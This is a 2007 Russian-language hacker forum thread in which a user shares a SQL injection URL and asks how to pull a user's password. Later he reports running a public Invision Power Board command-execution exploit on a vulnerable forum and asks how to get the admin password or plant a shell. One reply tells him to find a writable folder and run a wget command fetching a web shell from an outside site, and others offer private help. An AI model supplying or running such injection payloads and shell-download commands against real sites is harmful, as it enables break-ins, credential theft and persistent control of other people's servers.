помогите с Sql Inj

Discussion in 'Песочница' started by Aerot1smo, 7 Feb 2007.

  1. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    вот нашёл
    http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

    как составить запрос чтобы получить пасс юзера?
    прошу помогите
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    универсального запроса нет :) если хочешь чтоб за тебя всё сделали то уж как минимум ссылку в студию. А если хочешь сам - то почитай в статьях про скуль инжи, клоновых тем вагон и тележка)
     
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Если линк не хочешь светить, то пиши мне в ПМ или в асю...
     
  4. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ну и мене напиши тож чтоль %)
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    там префикс ищи исходник.
     
  6. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    решил новую тему не делать
    всем привет опять,нашёл форум уязвимый IPB 2.1.5
    заюзал сплойт Invision Power Board 2.* commands execution exploit by RST/GHC
    вродебы всё ок,тока вот теперь появилась строка "Command for execute or 'exit' for exit #" чё там писать(напривем чтоб получить пасс админа или залить шелл)?
     
  7. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    ищешь папку, где у тебя прав хватает на запись и там:
    wget site.com/yourshell.php
    про комманды можно в гугле много интересного найти)